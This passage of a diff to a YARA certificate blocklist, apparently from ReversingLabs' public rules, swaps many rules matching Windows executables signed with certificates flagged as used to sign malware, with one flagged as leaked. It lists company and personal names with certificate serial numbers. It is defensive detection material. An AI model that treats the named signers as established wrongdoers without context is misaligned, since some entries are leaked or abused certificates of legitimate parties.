-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7634-L7650"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1672-L1688"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "016ca6dcb5c7c56c80e4486b84d97fb3869a959ef3e8392e4376a0a0de06092f"
+		logic_hash = "ef058c0ec352260fa3db0fc74331d1da3c9eb8d161cef7635632fd7c569198c6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17549,21 +39943,21 @@ rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" and 1606143708 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Hetem Ramadani" and pe.signatures [ i ] . serial == "56:e2:2b:99:2b:4c:7f:1a:fe:ac:1d:63:b4:92:bf:54" and 1435622399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Bc3Bae4118D46F3Fdd9Beeeab749Fee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aaa31642-a0f4-5652-b3cd-c81cfb1ab127"
+		id = "0d2f1f5f-119a-5069-abcb-e4e93d9964c3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7652-L7668"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1690-L1706"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "018e5a0fbeeaded2569b83e2f91230e0055a5ffa2059b7a064a5c2eda55ed2de"
+		logic_hash = "fcbda27f8bf4dca8aa32103bb344380c82f0c701c25766df94c182ef94805a12"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17573,21 +39967,21 @@ rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3N-\\xC5\\xA0PORT podjetje za in\\xC5\\xBEeniring, storitve in trgovino d.o.o." and pe.signatures [ i ] . serial == "30:af:0d:0e:6d:82:01:a5:36:96:64:c5:eb:bb:01:0f" and 1613433600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\x8E\\xE9\\x9B\\xAA\\xE6\\xA2\\x85" and pe.signatures [ i ] . serial == "3b:c3:ba:e4:11:8d:46:f3:fd:d9:be:ee:ab:74:9f:ee" and 1442275199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F0449F7691E5B4C8E74E71Cae822179 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "82d6c0f5-80d1-5003-a5c9-9eadd9654460"
+		id = "17c99772-f2f9-56bc-be01-d9f62626a9ff"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7670-L7688"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1708-L1724"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2bc31eaa64be487cb85873a64b7462d90d1c28839def070ce5db7ae555383421"
+		logic_hash = "f8d3593b357f27240a4399e877ae9044f783bb944ad47ec9fe8bbecc63be864c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17597,21 +39991,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and ( pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" or pe.signatures [ i ] . serial == "ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" ) and 1604620800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SBO INVEST" and pe.signatures [ i ] . serial == "0f:04:49:f7:69:1e:5b:4c:8e:74:e7:1c:ae:82:21:79" and 1432079999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_43Db4448D870D7Bdc275F36A01Fba36F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0bf561ac-0283-557f-a685-4603e2b58273"
+		id = "47b3e681-87ae-5e70-8d02-18aa0daab0dc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7690-L7708"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1726-L1742"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8e0a11efc739baefe23a3d77e4eefc9dc23c74821c91fc219822dbc5dbb468b1"
+		logic_hash = "951e35e2c3f1bd90a33f8b76b6ede5686ee9b9c97a4c71df5b9dff15956209c5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17621,21 +40015,21 @@ rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and ( pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" or pe.signatures [ i ] . serial == "c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" ) and 1604361600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3-T TOV" and pe.signatures [ i ] . serial == "43:db:44:48:d8:70:d7:bd:c2:75:f3:6a:01:fb:a3:6f" and 1436227199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2880A7F7Ff2D334Aa08744A8754Fab2C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e3ad8f20-d12f-54e9-a6da-7aad28a10287"
+		id = "b079b564-9284-59b6-9703-4e33f2b2c44d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7710-L7728"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1744-L1760"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b1d6f27fb513542589a5c9011e501a9d298282bba6882eac0fc7bf3e6ebb291"
+		logic_hash = "03c7e1251c44e8824ae3b648a95cf34f4c56db65d76806306a062a343981d87f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17645,21 +40039,21 @@ rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and ( pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" or pe.signatures [ i ] . serial == "92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" ) and 1605139200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Garena Online Pte Ltd" and pe.signatures [ i ] . serial == "28:80:a7:f7:ff:2d:33:4a:a0:87:44:a8:75:4f:ab:2c" and 1393891199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0492F5C18E26Fa0Cd7E15067674Aff1C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1b8390aa-16b9-558b-aee8-e30fc7100af4"
+		id = "6a176d4a-5d3e-5184-b923-12d561e7034a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7730-L7746"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1762-L1778"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4ae755e814ae2488d4bd6b8136ab6d78e4809a2ddacb7f88cf1d2b64c1488898"
+		logic_hash = "d47d59d7680000d6c35181be2d9b034c2ecb7ca754a39c8e11750ddd7246b47c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17669,21 +40063,21 @@ rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" and 1607040000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghada Saffarini" and pe.signatures [ i ] . serial == "04:92:f5:c1:8e:26:fa:0c:d7:e1:50:67:67:4a:ff:1c" and 1445990399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Aa668Cd6A9De1Fdd476Ea8225326937 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4f34fd37-908c-573c-ba53-5ab622589e88"
+		id = "bfff2210-8545-594d-8674-243e57e3dd09"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7748-L7764"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1780-L1796"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4b58c83901605d8b43519f1bc2d4ac8dc10c794f027681378b2bee2a8ff81604"
+		logic_hash = "706e16995af40a6c9176dcbca07fb406f2efe4d47dbd9629d1a6b1ab1d09b045"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17693,21 +40087,21 @@ rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" and 1606435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BSCP LIMITED" and pe.signatures [ i ] . serial == "6a:a6:68:cd:6a:9d:e1:fd:d4:76:ea:82:25:32:69:37" and 1441583999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Cb06Dccb482255728671Ea12Ac41620 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "386c81ef-87aa-514e-81d7-dddfb90e0dc2"
+		id = "5a7f61a4-15ba-5f5c-89e1-b8b986e13f19"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7766-L7784"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1798-L1814"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "883545593b48aa11c11f7fa1a1f77c62321ea86067f1ed108dcd00c8c6cd3495"
+		logic_hash = "e0867ffe2ddd28282fe78b27b3b12ebac525b33a27dd242bc6f55bcd2e066a18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17717,21 +40111,21 @@ rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and ( pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" or pe.signatures [ i ] . serial == "e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" ) and 1604966400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fangzhen Li" and pe.signatures [ i ] . serial == "1c:b0:6d:cc:b4:82:25:57:28:67:1e:a1:2a:c4:16:20" and 1445126399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_370C2467C41D6019Bbecd72E00C5D73D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c72b8b2a-3e49-5ac3-ab4d-55b86ce7f061"
+		id = "18c5d1bb-21b8-5157-a03b-8bcbdc74c0cd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7786-L7804"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1816-L1832"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "03ac299459a1aaf2e4a2e62884cd321e16100fee78b4b0e271acdd8a4e32525c"
+		logic_hash = "2b99522b75ee83d85b30146cb292b5a8a46dc300fb43dd9d39d9ca96c9d32d9b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17741,21 +40135,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kolorit" and ( pe.signatures [ i ] . serial == "00:9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" or pe.signatures [ i ] . serial == "9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" ) and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNINFO SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "37:0c:24:67:c4:1d:60:19:bb:ec:d7:2e:00:c5:d7:3d" and 1445299199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5067339614C5Cc219C489D40420F3Bf9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "cbc0c6ca-fab2-531e-b368-4d3fdc72509f"
+		id = "6e0cb6f9-0a92-5eb2-b13f-f9c4eb0ae6b1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7806-L7824"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1834-L1850"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e2044c6ddb80f3add13dfc3b623d0460ce8e9a66c5a98582f80d906edbbbd829"
+		logic_hash = "1716087285a093a3467583f79d7ae9bee641997227e6d4f95047905aedcc97c6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17765,21 +40159,21 @@ rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREVOKAPITAL, s.r.o." and ( pe.signatures [ i ] . serial == "00:a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" or pe.signatures [ i ] . serial == "a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" ) and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D-LINK CORPORATION" and pe.signatures [ i ] . serial == "50:67:33:96:14:c5:cc:21:9c:48:9d:40:42:0f:3b:f9" and 1441238400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6E32531Ae83992F0573120A5E78De271 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2c32499-4b0d-51ad-a10e-1ddd7218df84"
+		id = "37fc58ea-63d4-569d-968f-f4775403b0bb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7826-L7842"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1852-L1868"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b3a31a54132fd8ca2c11b7806503207a4197f16af78693387bac56879b5e1448"
+		logic_hash = "2b6d54ea8395c3666906b2e60c30b970c2c1b6f55ded874cbcc22dc79391fb34"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17789,21 +40183,21 @@ rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "6e:32:53:1a:e8:39:92:f0:57:31:20:a5:e7:8d:e2:71" and 1451606399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6967A89Bcf6Efef160Aaeebbff376C0A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7d4033b8-da1d-55f5-aa80-f96636650633"
+		id = "d6714f50-600b-5437-8be6-097f7dd93dc7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7844-L7862"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1870-L1886"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b965e897b42c39841e663cc144cf6e4a81fc9bcb64ce3a15a7ca021e95866b08"
+		logic_hash = "deb7465e453aa5838f81e15e270abc958a65e1a6051a88a5910244edbe874451"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17813,21 +40207,21 @@ rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o., Ljubljana" and ( pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" or pe.signatures [ i ] . serial == "92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" ) and 1607040000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Chang Yucheng" and pe.signatures [ i ] . serial == "69:67:a8:9b:cf:6e:fe:f1:60:aa:ee:bb:ff:37:6c:0a" and 1451174399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7473D95405D2B0B3A8F28785Ce6E74Ca : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "75ec52c5-4c59-51d8-bd9b-928c75d3521a"
+		id = "7f44b9d8-917b-5fc4-9651-cce89358e415"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7864-L7880"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1888-L1904"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a9ee8534d89b8ac8705bb1777718513a28e4531ed398f482f46a72f2760af161"
+		logic_hash = "e15b990b13617017ca2d1f8caf03d8ff3785ca9b860bf11f81af5dadf17a9be5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17837,21 +40231,21 @@ rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" and 1608024974 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitrij Emelyanov" and pe.signatures [ i ] . serial == "74:73:d9:54:05:d2:b0:b3:a8:f2:87:85:ce:6e:74:ca" and 1453939199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04F380F97579F1702A85E0169Bbdfd78 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "92baa26f-1352-53ed-bb9f-0a632e471dd5"
+		id = "860027ff-2df2-5519-afde-60ebee270290"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7882-L7900"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1906-L1922"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b3e6927abfce69548374bfd430a3ae3a1c5a8d05f0f40e43091b4d12025c5b1a"
+		logic_hash = "73dc6e36fdaf5c80b33f20f2a9157805ce1d0218f3898104de16522ee9cfd51b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17861,21 +40255,21 @@ rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE
 		importance = 25
 
 	condition:
